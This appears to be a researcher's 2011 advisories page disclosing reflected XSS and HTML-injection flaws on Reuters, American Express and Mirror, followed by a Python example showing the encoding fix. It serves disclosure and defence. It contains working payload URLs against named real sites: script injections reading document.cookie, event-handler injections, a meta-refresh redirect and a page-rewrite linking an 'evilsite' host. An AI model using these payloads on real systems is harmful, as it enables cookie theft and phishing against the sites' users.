


Advisories

Here are the most important vulnerabilities that I have discovered and reported to vendors in recent years.

XSS


Reuters Finance HTML injection + XSS

Date of discovery: 10 March 2011

Reuters Finance is vulnerable to a Cross-Site Scripting (XSS) attack and to HTML code injection.

XSS Example:

http://www.reuters.com/finance/markets/index?symbol=us!comp&sortBy=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Opening this URL executes arbitrary JavaScript passed in the sortBy parameter; in this case it simply displays the user's cookies. Because the script runs under reuters.com, it is possible to redirect a user to any site while the trusted domain acts as a "safe shield", e.g. in phishing attacks.

HTML Injection Example:

http://www.reuters.com/finance/markets/index?symbol=us!comp&sortBy=%22%3E%3Cmeta%20http-equiv=%22refresh%22%20content=%220;url=http://google.com%22%3E

This request redirects the user to google.com (any other evil site works too) using a META refresh tag; no JavaScript is required.

http://www.reuters.com/finance/markets/index?symbol=us!comp&sortBy=%22%3E%3Cscript%3Edocument.body.innerHTML=%27%3Chtml%3E%3Cb%3ETest!%3C/b%3E%3Cbr%3E%3Cbr%3E%3Ci%3EEvil%20content%20%3Ca%20href=http://evilsite.com%3Ehere%3C/a%3E!%3C/i%3E%3C/html%3E%27;%3C/script%3E

This URL rewrites the page body completely using JavaScript (via the XSS vulnerability).

Reuters has been notified. Status: WAITING FIXED.

Reuters.com multiple XSS vulnerabilities

Date of discovery: 10 August 2011

Reuters is vulnerable to Cross-Site Scripting (XSS) attacks.

XSS Examples:

http://www.reuters.com/assets/commentsChild?articleId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

http://charts.reuters.com/reuters/enhancements/chartapi/chart_api.asp?symbol=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E

Reuters has been notified. Status: WAITING.

AmericanExpress.com XSS vulnerability (SSL with Extended Validation bypass)

Date of discovery: 13 August 2011

The American Express website is vulnerable to a Cross-Site Scripting (XSS) attack.

Since an attacker can execute arbitrary JavaScript in the context of the site, the assurance given by the SSL Extended Validation (EV) certificate is bypassed.

XSS Example:

https://passrewards.americanexpress.com/nr____.htm?&mnpos=%22%20onload=%22alert%28document.cookie%29%22

American Express has been notified. Status: WAITING FIXED.

Mirror.co.uk XSS vulnerability

Date of discovery: 18 August 2011

The Mirror is vulnerable to Cross-Site Scripting (XSS) attacks.

XSS Example:

http://www.mirror.co.uk/weather/index.cfm?town=%3Cimg%20src=x%20onerror=alert%28document.cookie%29%3E

The Mirror has been notified. Status: WAITING.
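All four findings above share one root cause: a query parameter is reflected into the page without HTML encoding, so a value can close the attribute it lands in (sortBy, mnpos) or open a new tag in element text (symbol, town). The following Python is an added example, not code from this page or from any of the vendors named: it uses hypothetical templates (ATTR_TEMPLATE and TEXT_TEMPLATE are assumptions) to model both reflection contexts, shows html.escape(quote=True) as the fix, and uses the standard-library HTML parser to confirm that the decoded PoC parameters inject no tags or event handlers once encoded.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed input: the proof-of-concept URLs from this page, used here only
# as test data for the encoding check below.
POC_URLS = {
    "sortBy": "http://www.reuters.com/finance/markets/index?symbol=us!comp"
              "&sortBy=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E",
    "mnpos": "https://passrewards.americanexpress.com/nr____.htm"
             "?&mnpos=%22%20onload=%22alert%28document.cookie%29%22",
    "town": "http://www.mirror.co.uk/weather/index.cfm"
            "?town=%3Cimg%20src=x%20onerror=alert%28document.cookie%29%3E",
}
# Hypothetical server-side templates (assumed, not the vendors' real code): one
# reflects the parameter inside a quoted attribute, one inside element text.
ATTR_TEMPLATE = '<div id="page" data-pos="{value}">'
TEXT_TEMPLATE = '<h1>Weather for {value}</h1>'

def param_value(url, name):
    """Percent-decoded value of one query parameter, as the server would see it."""
    return parse_qs(urlsplit(url).query)[name][0]

def render_unsafe(template, value):
    """Vulnerable pattern: the raw parameter is pasted straight into the markup."""
    return template.replace("{value}", value)

def render_safe(template, value):
    """Fix: HTML-encode the value (quotes included) so it can neither close the attribute nor open a tag."""
    return template.replace("{value}", html.escape(value, quote=True))

class MarkupAudit(HTMLParser):
    """Records start tags and on* event-handler attributes seen while parsing."""
    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]

def injected_markup(template, value, renderer):
    """(extra tags, handler attributes) that exist only because of the reflected
    value; ([], []) means the browser would treat the value as inert data."""
    baseline = MarkupAudit()
    baseline.feed(template.replace("{value}", "x"))
    rendered = MarkupAudit()
    rendered.feed(renderer(template, value))
    return sorted(set(rendered.tags) - set(baseline.tags)), rendered.handlers
```

Running injected_markup with render_unsafe reports a script tag for sortBy, an onload handler for mnpos and an img tag with onerror for town; with render_safe all three come back as ([], []).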